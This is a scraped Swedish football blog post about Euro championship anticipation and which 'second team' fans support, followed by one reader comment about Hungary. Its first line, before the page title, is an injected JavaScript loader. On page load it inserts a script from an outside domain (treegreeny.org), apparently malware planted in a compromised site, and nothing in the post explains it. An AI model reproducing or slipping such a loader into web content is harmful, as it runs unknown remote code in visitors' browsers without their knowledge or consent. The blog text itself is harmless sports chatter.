;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: En smygande feber – FMSweden
Meny Stäng

Fabbes blogg: En smygande feber

Ny månad gör att EM-febern höjs, så även i denna veckas blogg.

I fredags bjöd Tobbe på ett tidigt förhandstips kring sommarens EM-slutspel, och i måndags tog Hampus ut Englands trupp och siade kring hur sommaren kommer se ut för Three Lions. Och inte är väl jag sämre än att snacka lite mästerskap också?

Ett fotbollsmästerskap är så otroligt många saker. Det är gemenskapen när Sverige spelar, ölen på uteserveringen en varm sommarkväll framför England-Nederländerna i en slutspelsmatch, och det är junioren i Nordmakedonien du aldrig hört talas om. Alla har vi våra associationer kring olika mästerskap, och man minns vissa saker så detaljerat att man funderar kring hur det ens är möjligt.

För mig är inte ett EM bara att hoppas på framgång för Sverige. Under åren har man byggt upp relationen även till andra landslag, och faktum är att de mästerskapen som Sverige missat har varit precis lika roliga fast på ett helt annat sätt. Jag tror att det är ganska vanligt att man har ett ”andralag” att hålla på under mästerskapen. Vissa håller på Italien för att man drack en Peroni i Rom en sommarsemester 2007, hos andra klappar hjärtat lite extra för Finland eftersom gammelmorfar var halvfinsk. Vissa har Skottland som favorit då man tycker att det är det närmsta Tipsextra-fotboll man kan komma, och sen finns det alltid dem som ska hålla på Frankrike för man gillar champange och baguetter. Ungern? Ja, de håller då fan ingen alls på. Gulasch – usch.

Själv är jag inte bättre. Mitt andralag i sommar, likt andra mästerskap, är självklart Ryssland. Självklart? Jag är egentligen inte bättre än någon av de jag nämnde här ovan. Min moster bodde i Ryssland några år, jag var där och gillade vad jag såg. Vilket jag måste vara den enda turisten som någonsin gjort, men så är fallet. Dessutom har jag det eminenta mellannamnet Boris, vilket borde göra mig till något procent ryss?

Så nu vill jag veta vad ni har för andralag i sommaren slutspel. Är du killen som såg en Serie A-match en gång och nu kallar Italien för ditt? Eller klippte du tuppkam en gång för att Marek Hamsik, blåvittlegenden ni vet, hade det och nu känner du en gemenskap med Slovakien? Berätta i kommentarerna.

Nästa veckas blogg kommer innehålla mitt EM-tips. Håll i hatten – och ska ni spela på EM så gör precis tvärtemot hur jag gör. Då blir ni miljonärer!

Please wait...

Liknande Inlägg

1 kommentar

  1. raca14

    Mitt andra landslag är Ungern, trots den hemska gulaschen! 😛
    Med morföräldrarna från Ungern så är det ett givet val, sedan får man bara hoppas att de kan skrälla sig vidare från en “Dödens grupp” med Tyskland, Frankrike och Portugal med idel storstjärnor.
    När man dessutom har en potentiell storstjärna i Dominik Szoboszlai, så finns väl kanske iaf en liten chans, får man hoppas…

    Sedan hade det varit kul om även Finland hade kunnat skrälla sig vidare från sin grupp.

Lämna ett svar